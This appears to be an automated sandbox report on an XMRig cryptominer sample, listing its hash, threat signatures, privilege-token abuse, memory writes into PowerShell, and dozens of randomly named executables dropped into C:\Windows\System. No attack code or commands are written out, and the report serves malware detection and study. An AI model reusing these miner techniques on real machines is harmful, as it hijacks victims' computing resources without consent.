Malware Analysis Report

2025-04-19 18:41

Sample ID 240527-grbb8sad7z
Target 21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe
SHA256 e7a1cf08b9a9d5d430c647e5768dbccdec2d920a29adc736092500964d6ab355
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e7a1cf08b9a9d5d430c647e5768dbccdec2d920a29adc736092500964d6ab355

Threat Level: Known bad

The file 21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

xmrig

XMRig Miner payload

Xmrig family

XMRig Miner payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Enumerates system info in registry

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-27 06:01

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-27 06:01

Reported

2024-05-27 06:04

Platform

win7-20231129-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\ySEPBUs.exe N/A
N/A N/A C:\Windows\System\SaGdFru.exe N/A
N/A N/A C:\Windows\System\hwDwGpz.exe N/A
N/A N/A C:\Windows\System\OXIMvCN.exe N/A
N/A N/A C:\Windows\System\gJaZqcx.exe N/A
N/A N/A C:\Windows\System\mmgPhUr.exe N/A
N/A N/A C:\Windows\System\wtbMaTi.exe N/A
N/A N/A C:\Windows\System\xryNSlD.exe N/A
N/A N/A C:\Windows\System\smiSLgQ.exe N/A
N/A N/A C:\Windows\System\UWblMKU.exe N/A
N/A N/A C:\Windows\System\HMrlYTT.exe N/A
N/A N/A C:\Windows\System\poJhkXl.exe N/A
N/A N/A C:\Windows\System\pUfQfkn.exe N/A
N/A N/A C:\Windows\System\YCNvqar.exe N/A
N/A N/A C:\Windows\System\ZFXnwYe.exe N/A
N/A N/A C:\Windows\System\UkLCXyc.exe N/A
N/A N/A C:\Windows\System\pEEfbXR.exe N/A
N/A N/A C:\Windows\System\qgOZnMX.exe N/A
N/A N/A C:\Windows\System\kLmZeaz.exe N/A
N/A N/A C:\Windows\System\gTCAyvO.exe N/A
N/A N/A C:\Windows\System\rixMtLF.exe N/A
N/A N/A C:\Windows\System\hkJMpDu.exe N/A
N/A N/A C:\Windows\System\lPvhgkD.exe N/A
N/A N/A C:\Windows\System\seGZyPG.exe N/A
N/A N/A C:\Windows\System\zoEBvre.exe N/A
N/A N/A C:\Windows\System\WhRyIFF.exe N/A
N/A N/A C:\Windows\System\epfFlsR.exe N/A
N/A N/A C:\Windows\System\BVKbfKl.exe N/A
N/A N/A C:\Windows\System\gwoRNsk.exe N/A
N/A N/A C:\Windows\System\QlhXaDE.exe N/A
N/A N/A C:\Windows\System\flCAdqM.exe N/A
N/A N/A C:\Windows\System\GpYlcpA.exe N/A
N/A N/A C:\Windows\System\zsTQSfg.exe N/A
N/A N/A C:\Windows\System\askiGRV.exe N/A
N/A N/A C:\Windows\System\djYelDT.exe N/A
N/A N/A C:\Windows\System\NogQCTo.exe N/A
N/A N/A C:\Windows\System\LHwlBdA.exe N/A
N/A N/A C:\Windows\System\jfEFViD.exe N/A
N/A N/A C:\Windows\System\Gyzijzt.exe N/A
N/A N/A C:\Windows\System\qaBlhVa.exe N/A
N/A N/A C:\Windows\System\bzifaJW.exe N/A
N/A N/A C:\Windows\System\GyklXLO.exe N/A
N/A N/A C:\Windows\System\prttWPR.exe N/A
N/A N/A C:\Windows\System\XWcxnih.exe N/A
N/A N/A C:\Windows\System\MCQjKyo.exe N/A
N/A N/A C:\Windows\System\XPUHGqQ.exe N/A
N/A N/A C:\Windows\System\pwUBeNN.exe N/A
N/A N/A C:\Windows\System\TZiucLU.exe N/A
N/A N/A C:\Windows\System\OVfJaxr.exe N/A
N/A N/A C:\Windows\System\YsHIFnQ.exe N/A
N/A N/A C:\Windows\System\MNfVUzt.exe N/A
N/A N/A C:\Windows\System\pfTMLjb.exe N/A
N/A N/A C:\Windows\System\ZeyZkET.exe N/A
N/A N/A C:\Windows\System\xZiOADO.exe N/A
N/A N/A C:\Windows\System\oGLBtVT.exe N/A
N/A N/A C:\Windows\System\brwaOFj.exe N/A
N/A N/A C:\Windows\System\kcjfwLh.exe N/A
N/A N/A C:\Windows\System\tSOzyeA.exe N/A
N/A N/A C:\Windows\System\QPVJENK.exe N/A
N/A N/A C:\Windows\System\CXcIgVR.exe N/A
N/A N/A C:\Windows\System\BNCbUPE.exe N/A
N/A N/A C:\Windows\System\VKvHNeb.exe N/A
N/A N/A C:\Windows\System\rPKaoha.exe N/A
N/A N/A C:\Windows\System\kmRgCdN.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\wnoxQth.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\XShgpzZ.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\TPvlJeF.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\EUyUuLE.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\YNaFYYu.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\PYDmYoT.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\lSiXjAo.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\dJiqoFY.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\nHqFEfy.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\YRsrMWj.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\XDrIPiC.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\hYyZTSs.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\zxwPPjY.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\bhIlDiF.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\bkjgHNh.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\GWDmDPh.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\ClsVqLX.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\YgmAukl.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\ayKrUDs.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\OgWDdax.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\LnnCAEM.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\yuhPGiI.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\xnOGXRo.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\EBJfGjn.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\hjgtdgE.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\npuCNkJ.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\mggtyMS.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\MheSugJ.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\oYgwuak.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\qzOVAuW.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\ODJeeMj.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\TFxAOEK.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\gPXmgcd.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZnYaTDY.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\DDwOBgd.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\RqMcQdY.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\rGNauHd.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\UnensQU.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\WTBqiyH.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\glRJYbY.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\BxjKNVY.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\gDWVkfx.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\FGNDvwi.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\tylFxbo.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\qxUSJlw.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\gJYKkJH.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\KONtGGs.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\ariGJwc.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\ckfTKbK.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\eYDjGrn.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\HJXTVIA.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\ilUtKNX.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\nNBpGZH.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\xgYsYjd.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\kcjfwLh.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\JddfMjX.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\cPGYEfd.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\bocUmqa.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\EBmJZOR.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\OqcMBed.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\QXaIOVp.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\FgTlYPZ.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\uShDXRJ.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
File created C:\Windows\System\FvtdxcY.exe C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2196 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2196 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2196 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2196 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\SaGdFru.exe
PID 2196 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\SaGdFru.exe
PID 2196 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\SaGdFru.exe
PID 2196 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\ySEPBUs.exe
PID 2196 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe C:\Windows\System\ySEPBUs.exe
